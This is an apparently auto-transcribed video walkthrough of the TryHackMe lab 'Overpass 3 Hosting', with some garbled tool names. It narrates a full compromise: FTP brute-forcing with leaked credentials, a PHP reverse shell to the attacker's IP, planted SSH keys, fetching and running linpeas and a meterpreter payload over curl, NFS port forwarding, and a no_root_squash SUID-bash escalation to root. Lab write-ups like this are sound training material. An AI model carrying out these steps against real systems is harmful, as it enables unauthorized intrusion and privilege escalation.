Yo, what's going on, guys? In this video, we're going to be doing Overpass 3 hosting from TryHackMe. This is Box Root about Medium. And yeah, let's get on to the video. So I'm going to start by putting my terminal here. I'm starting by doing a ping -c. We'll do the count for 3. For 10, 10, 51, 24. Does seem like the IP is up. So I'm starting running mmapps again. So do -ssc for default scripts. My ZV information will count ports on the IP. Doing this, I'll do my ZV verbose. Like the ports, we have port 2 open for SSH, port 2 open for FTP, and also port open for HTTP. So I'm starting visiting port 80. Here we get Overpass hosting here. I'm going to do control use source code. And it doesn't seem like we do get anything. Look at this, we do have some usernames here. Paradox, Elf, Maryland, Ninja JC01, and also followed by his real name. Seems like James is his real name, who started Overpass. Then this, I'm going to start by doing some more enumeration for the GoBuster. So I'll do Control-Shift-X. The GoBuster remote minus here into the IP address. We'll do -w for /user show lister buster directory. Lister with the medium.txt. We'll do extensions HTML, TXT, and also PHP. Look at this, we do have index HTML and also e/backups here. Look at the ports, we do have the same 3 ports. 22 open for SSH, port 21 open for FTP, and also port open for HTTP. Looking at this, I'm going to start by visiting /backups here. Here we do have a backup.zip, so I'm just going to copy this, copy link location, and I'm just going to get this onto my machine. Here we do have a backup.zip, so I'm just going to unzip backup.zip. We do have a customer details, which is going to be for Excel sheet, since it does have the extension for XLSX, followed by GPG, which I can just extract that using customer, right? GPG. And you do see that I do have, basically it just does when it shows no commands applied, it just tries to guess what you mean, and it does extract it just to, without the GPG. Now we do have a customer details Excel sheet. We also do have this encrypted with 2048. We do have Paradox for Paradox at Overpass THM. So we do have a host name now. Look at this. I'm just going to search up Excel. Let's do Excel viewer. We'll just do online. Let's see if we can find one here. So we do have, let's go browse here. So I'm going to go other locations. We'll go to backup. So we'll go to backup. We'll go to TryHackMe. We'll just go to Overpass. And now we do have a customer details Excel sheet, right? Look at this. We do have a customer name, columns for customer name, username, password, credit card number. We do have a Paradox, 0 day, and just basically the usernames and the password, right, for each column. Doing this, I'm just going to do, we'll do mkdir for brutes, cd into root. I'm just going to create a users.txt. I'm just going to be copying get user in here, so I'll just copy Paradox. We'll go into Reactimo. We do have 0 day, and this user, right, and right quit, right, yeah, we do have that user. So I'm just going to right quit. Now we do have a users.txt. I'm also going to create a passwords.txt. I'm going to go into reactive mode. We do have shibes are great. 1, 2, 3. We have this password here. And all dogs are awesome. So I'm just going to right quit. We do have a passwords.txt now. Doing this, I'm going to start up Hydro, do Hydro -L. Specify capital L, since we do have a word list, which can be for users.txt. We'll just do have -p for passwords.txt. We'll do FTP. We did have the IP address as 10.10.51.24. We have this for port 21. We'll do -i for so we don't session. Again, this we do have a host, which is on 10.10.51.24, login Paradox, and shibes are great. So I'm going to FTP into 10.10.10.54.51.24. We have a Paradox. Also do have the password shibes are great. We do have SLA. We do have a backups here. We do have a main CSS, Overpass SVG. Doesn't seem like we do have anything. I'm also going to go under /backups here. So you can put like a password.txt. If we can put the password.txt, that means we can put a PHP shell and also change the permissions. If I do a question mark here, you'll also see that I do have a chmod here. chmod is going to let us change those permissions for that file. So it doesn't seem like we can put anything in here. I'm also going to put we'll put this passwords.txt. Now we do have the passwords.txt. Just to confirm, I'm also going to visit /passwords.txt. You do see that this is stored on the server under var www.html. So I'm going to do s-la. I'm just going to go to, we'll just search up GitHub PHP rev shell. I'm just going to go to this one right here. We'll go to PHP shell.php. We'll go to raw data. Copy this. I'm just going to get this. Do here. We'll be into PHP shell. PHP shell. We do have my IP address, which I'm just gonna do. I have config here 10.8.165.68. Copy that in there. We'll change the port to 9001. Right quick. I'm just gonna cat this PHP shell. We'll grab help for head. Now we do have the IP and also the port. So doing this, I'm gonna start my listener here. So I'll do a little rep and I count my sound VP on 9001. We can put that PHP shell in there. Do we have this under here? It's under brute. So we do have paradox, followed by the password here. Stripes are great 123. Now we can put the PHP shell in there. Put PHP shell.php. We have chmod. We'll put this +x for PHP. And I'm just going to copy this PHP shell.php. Put this under here. Access denied, so we do need to change the permissions. We'll do chmod 777 for PHP shell. Refresh this. We do ID. And now we're under Apache. So I'm going to start by exporting my term is equal to next term. I'm going to start by running up bin /bash -i. We do ID. Now we're under Apache. So I'm going to start by doing some manual information under /opt. I'm going to go under /var www.html. Doesn't seem like we do have anything under here. Check under /backups. Nothing under here. I'm also going to go under /var. It doesn't seem like we do have a backups under here. I'm going to start by checking for under /home. You have a James Paradox. So most Switch users are Paradox. Let's see if that is the same password for that we did have for Paradox. For FTP. Copy this, which should be the same, right? We do ID. Now we're under Paradox. So we're going to bin /bash -i. So I'm going to go under /home. We'll see into Paradox. /la. We do have a .sh under here, which I can just put my own authorized underscore keys under here, override it. So I'll do mkdir for keys, cd into keys. I'm just going to do, we'll do ssh-keygen. Copy from /root.ssh. We'll do id_c to this directory. Also copy the .pub. We'll cat the id_c.pub. We can just put this in here. So I'm just going to echo, put this in here. I'll put this to an authorized underscore keys. We'll copy this, paste this into paradox.sh. Now we can just change the permission. It does seem like this is only read and write, but just to make sure, just put chmod 600. Now we do have the private key for the public key. So SSH into paradox. You have 10.0, 10.10. See the IP address 10.10, 51.24. $10.10.51.24. We'll do -i for id_sa. We do yes. And now we're under paradox. We do ID. And now we're under paradox. Some server running a sudo myself. We do have passwords required for paradox. I'm just going to copy the password for paradox. Doesn't seem like I can run sudo under here. I'm going to start by running a lint piece. I'll do dev cd into dev shm. I'm just going to wget. Do we have wget? We don't have wget, so we do have curl, I believe. So we'll do curl, we'll do HTTP. For my page, it says 10.8.165.68. We'll do some port 8081. We'll get that linpiece.sh. We'll cd into my documents. We'll go into privilege escalation. We'll cd into linpiece. We'll do python 3 minus m http.serve on port 8081 or linpiece.sh. We can get that file. This is curl, so I do need to output this to a file, which going to be linpiece.sh, dchmod, or dchmod plus x for linpiece.sh. Run this linpiece.sh and I'll put it to file.txt. Doing this, we can just wait and view the file for file.txt. Linpiece is not done, so I'm just going to move into file.txt. So right now I'm just looking for the PE vector, which is, right now I'm just looking for the PE vector, which is going to be for what is highlighted in yellow, which is for the privilege escalation vector. Doesn't seem like we do have anything so far. Look at this, it does seem like we do have NFS exports here. We do have this no underscore root squash, which is insecure. Also do have for read and write. For the home, for /home James. Looking into this, we can actually use the mount command to mount this. By default, I would just make like a temp directory for like share. I'll just like make a directory for share under /temp. I'll do like a mount -t for NFS, which can be for the type for NFS. I'm just gonna run ifconfig or IP adder for 10.10.51.24. I'll do mount -t for NFS with the IP address. For this case, we do have /home James. I believe we do have /home James, which you can mount for all the file system. The whole file system, which can be under this directory. I'll just do like temp share. This case, it doesn't let us use the mount command, so we can start by port forwarding this. Another way to confirm the shares is using the show mount command. So I do show mount -e. The IP address for 10.10.51.24. You do see that we can export everything that's under /home for each file, right? So I'm gonna start by checking my connections here. So I'm gonna start running netstat. So do netstat. See if nets has installed. Doesn't seem like nets has installed. So do ss -tlvp. By default, I believe we do have this listening on 2049. If I do check what port is 2049. You'll see that I do have for NFS for 2049, which is the network file share or file system at NFS. I also do need to spawn I do need to start port forwarding. So I'm just going to do NSF Venom. We'll do interpreter, interpreter. So I'm going to be looking for a interpreter, which is going to allow us to use Metasploit and port forward this port, which can be for 2049 on our local host. So we do have this here. I'm just going to copy this. Let me just I'll just exit out this one. I'll make a directory for shell. We'll cd into shell. We'll do ifconfig here. So we do have my IP address here, which is going to be for 10.8.165.68. We'll do this on 5555. I'll just do this on 9001. My favorite port for 9001. Which is I'll put this for elf. I'm just going to exile this. We'll start up MSF console here. So we can start a listener for Metasploit, which is basically just using netcap, but it's using Metasploit for like an exploit multi-handler. So we'll do exploit multi-handler. We'll do show options. We do need to specify the outhost, which is going to be 10.8. 10.8. We'll set the L port. We did have this on 9001. Set the payload type. We did have the payload for this. Now we can just run this. Control L. Run this. We do have the TCP handler started. So I'll do Python 3 minus m http.server. http.server port 8021. We do have this on 10.8.165.68. So I'm cd into /dev shm. We'll just wget http for 10.8.165.68 port 8081. We do have the file name here for shell.elf. Forgot we don't have curl, so yeah. We don't have wget, so I'm gonna use curl. I'll put it to a shell. We'll do chmod plus x for shell. Run this shell. Press enter on that. This seems like we give it to root session open. Now I can run sysinfo. You do see that I am under CentOS for localhost.localhost.domain. So I'm gonna just clear. I'll do Ctrl. I'm gonna start running a run auto route, so I can start by port forwarding. We'll do -s for the subnet. I do specify this as the IP address, which is going to be for. We'll just take off this HTTP. We'll do the whole subnet, which can be for /24. So we'll do port forward add. We'll do -L for 2048 or 2049. We'll do -P for 2049. -L is going to be for the basically just the local. What I want this to be for port forward on, right, to my local host. The port -P is going to be for 2049, which is going to be on the server, right? That's listening on 2049. Do -R for the remote host. I can just do this on 10.10.51.24. I can do port forward. We'll do list. You do see that I do have this on local for 2049, remote for 2049, which is forwarded to my local host, right? So I'm just going to run nmap on my local host. Now you do see that I do have this on 2049. So doing this, I'm just going to make a directory for James, which is going to be for the directory that we do have under James on the server. So I'll do mount. We'll do mount -t, since we do have a 2049, which is now open for NFS. We'll do mount -t, we'll do NFS. We do have the IP address, which can be for localhost. We'll do this on James. Press enter on that. Now we do have a directory for James. We do else -la. Now I do have the .sh and also this user.flag. We can cat this user.flag, which is, we do have read and write. On lint piece, we did have the read and write, so that means we can put binaries and also files on under James directory that we do have as a share. I'm cd into .sh. We do have his private key here. So I'm SSH into, I can even port forward port SSH on here. So if I do like, if I do 22 on both of them, I can do like a port forward list. You see that port 22. Just to make it easier on us, I can run the local nmap again. I do a port 22, which is port forward now. So I'm just going to port forward to James at localhost. We'll do -i for ID_SA. We can just run this. We do yes, which are going to be for port forward to my localhost for port 22. We do ID, and I'm under James. Or I can just do the same thing since port 22 is open for SSH. I could just put the IP address, which is 10.10.51.24. We do ID, and I get the same result as if it was port forward or not port forward, right? So now that we do have the private key for James, I'm going to cd back into James here. I'm going to copy, I'm just going to copy a bin/bash to this directory. And now you'll notice that this is going to be owned by root. If I do a ID command, since I'm using my own group for the share on my local machine, it's going to be for root. So that means it's going to be copied as root. So if I do ID, you do see I am under the group for root. Now this means that this is going to be under root for bash. All I need to do is make this into a std binary. We'll do a u+s for bash. I'll cd into .ssh. We'll SSH into James. We'll do SMSLA. This is not executable. This is not going to work, but if I do a bash -p, permission denied, we'll cd back. We'll do chmod +x for bash. Now I do other permissions for executable and also SUID binary. So cd into .ssh. We'll SSH into James one more time. We'll do bash -p. We'll do ID. We're in the root, so we can cd into root. We'll do SMSLA and cat root flag.txt. We'll get this moving to the video. The link is great. And I'll catch you guys in the next one. Peace.